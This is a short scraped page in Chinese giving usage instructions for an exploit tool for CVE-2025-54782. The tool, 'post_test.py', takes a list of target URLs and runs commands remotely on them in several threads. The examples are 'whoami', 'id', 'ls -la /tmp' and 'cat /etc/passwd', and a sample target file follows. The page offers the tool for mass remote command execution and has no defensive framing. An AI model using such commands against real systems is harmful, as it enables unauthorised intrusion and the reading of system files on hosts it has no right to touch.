CVE-2025-54782 — CVE-2025-54782 | Kitploit
ddestinys/cve-2025-54782CVE-2025-54782
CVE-2025-54782
9个月前
- 基本使用:
1.use
bash
python post_test.py urls.txt
- 自定义命令:
2.command
bash
python post_test.py urls.txt -c "whoami"
python post_test.py urls.txt -c "ls -la /tmp"
python post_test.py urls.txt -c "cat /etc/passwd"
- 指定线程数:
bash
python post_test.py urls.txt -c "id" -t 10
📁 URL文件格式(urls.txt):
text
http://target1.com
https://target2.com
http://192.168.1.100:8080